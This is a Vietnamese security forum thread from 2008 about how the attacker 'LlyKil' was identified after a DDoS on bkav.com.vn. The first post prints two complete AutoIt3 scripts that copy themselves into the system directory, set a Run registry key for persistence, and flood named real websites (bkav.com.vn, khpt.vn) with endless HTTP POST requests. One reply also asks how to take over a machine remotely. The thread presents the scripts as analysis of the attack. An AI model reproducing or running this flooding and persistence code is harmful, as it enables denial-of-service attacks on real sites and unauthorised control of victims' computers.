LlyKil - người đã DDoS bkav.com.vn

Discussion in 'Bảo Mật - Security' started by thanhbinh, Dec 22, 2008.

  1. Offline

    thanhbinh

    • Già làng về hưu !! - banned

    Message Count:
    92
    Likes Received:
    94
    Trophy Points:
    18
    LlyKil - người đã DDoS bkav.com.vn
    (Tác giả:Phạm Đức Hải)
    Thông tin về vụ DDoS bkav.com.vn thì chắc ai cũng biết, đã có một bài viết về việc này.
    http://vietnamsecurity.googlepages.com/bkav

    Vậy là sao mà LliKil bị bắt ?
    Theo tôi nghĩ thì việc bắt được LliKil không có gì khó, theo tìm hiểu của tôi LlyKil không giấu các thông tin cá nhân khi thực hiện tấn công. Có thể LlyKil nghĩ đó chỉ là một trò chơi ?
    Bắt đầu bằng việc phần tích một vài file code dùng để tấn công (tìm không khó lắm)
    Code:
    #NoTrayIcon
    #region
    #AutoIt3Wrapper_res_comment=jhg
    #AutoIt3Wrapper_res_description=jhgjhg
    #AutoIt3Wrapper_res_fileversion=jhgjhg
    #AutoIt3Wrapper_res_legalcopyright=jhgjhg
    #endregion
    $PROCESS = ProcessList("chem.exe")
    If $PROCESS[0][0] > 3 Then Exit
    FileCopy(@ScriptFullPath, @SystemDir & "\chem.exe", 1)
    RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run", "chem", "REG_SZ", @SystemDir & "\chem.exe")
    $1 = IniRead(@SystemDir & "\chem.ini", "1", "1", "")
    IniWrite(@SystemDir & "\chem.ini", "1", "1", $1 + 1)
    If $1 = 2 Then
    RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "chem")
    EndIf
    TCPStartup()
    Dim $TIN[3]
    $TIN[0] = "bkav.com.vn"
    $TIN[1] = "bkav.com.vn"
    $TIN[2] = "bkav.com.vn"
    While 1
    $NGAUNHIEN = Random(0, 2, 1)
    $DATASIZE = StringLen("")
    $HOST = $TIN[$NGAUNHIEN]
    $PAGE = "/home.aspx"
    $SOCKET = TCPConnect(TCPNameToIP($HOST), 80)
    $COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
    $COMMAND &= "Host: " & $HOST & @CRLF
    $COMMAND &= "User-Agent: top1.vn" & @CRLF
    $COMMAND &= "Connection: close" & @CRLF
    $COMMAND &= "Referer: http://top1.vn" & @CRLF
    $COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
    $COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
    $COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
    $COMMAND &= "" & @CRLF
    TCPSend($SOCKET, $COMMAND)
    WEnd
    
    
    Một đoạn code khác :
    Code:
    #NoTrayIcon
    #region
    #AutoIt3Wrapper_res_comment=jhg
    #AutoIt3Wrapper_res_description=jhgjhg
    #AutoIt3Wrapper_res_fileversion=jhgjhg
    #AutoIt3Wrapper_res_legalcopyright=jhgjhg
    #endregion
    $PROCESS = ProcessList("khpt.exe")
    If $PROCESS[0][0] > 3 Then Exit
    FileCopy(@ScriptFullPath, @SystemDir & "\khpt.exe", 1)
    RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run", "khpt", "REG_SZ", @SystemDir & "\khpt.exe")
    $1 = IniRead(@SystemDir & "\khpt.ini", "1", "1", "")
    IniWrite(@SystemDir & "\khpt.ini", "1", "1", $1 + 1)
    If $1 = 5 Then
    RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "khpt")
    EndIf
    TCPStartup()
    Dim $TIN[3]
    $TIN[0] = "khpt.vn"
    $TIN[1] = "khpt.vn"
    $TIN[2] = "khpt.vn"
    While 1
    $NGAUNHIEN = Random(0, 2, 1)
    $DATASIZE = StringLen("")
    $HOST = $TIN[$NGAUNHIEN]
    $PAGE = "/forum//index.php"
    $SOCKET = TCPConnect(TCPNameToIP($HOST), 80)
    $COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
    $COMMAND &= "Host: " & $HOST & @CRLF
    $COMMAND &= "User-Agent: LlyKil" & @CRLF
    $COMMAND &= "Connection: close" & @CRLF
    $COMMAND &= "Referer: http://google.com" & @CRLF
    $COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
    $COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
    $COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
    $COMMAND &= "" & @CRLF
    TCPSend($SOCKET, $COMMAND)
    WEnd
    
    
    Đoạn này có thông tin rất cụ thể về LliKil
    $COMMAND &= "User-Agent: LlyKil" & @CRL

    Hành động của LlyKil thực ra đã bị nhiều hệ thống ghi nhận và phát hiện. Các đoạn mã LlyKil viết bằng AutoIt3.
  2. Offline

    DungCoi

    • <font color="blue">Virusvn.com</font> - <font colo

    Message Count:
    36
    Likes Received:
    0
    Trophy Points:
    6
    Mẫu tấn công gồm nhiều mẫu, nhưng mẫu, nhưng cơ bản là chế biến lui lại nhiều lần, đoạn code quan trọng nhất như sau :

  3. Offline

    ac7ive

    • Knowledge Sharing

    Message Count:
    2,071
    Likes Received:
    358
    Trophy Points:
    83
    1 người cài backdoor vào chính máy mình và cũng là người bị mất lap 1 cách lãnh nhách =))....

    sẳn tiện hỏi.... có ai biết cách làm sao mà ghost máy từ xa ko:|.... bửa chat với chàng, chàng khoe thế. Ko hiểu cách thức làm :|

Share This Page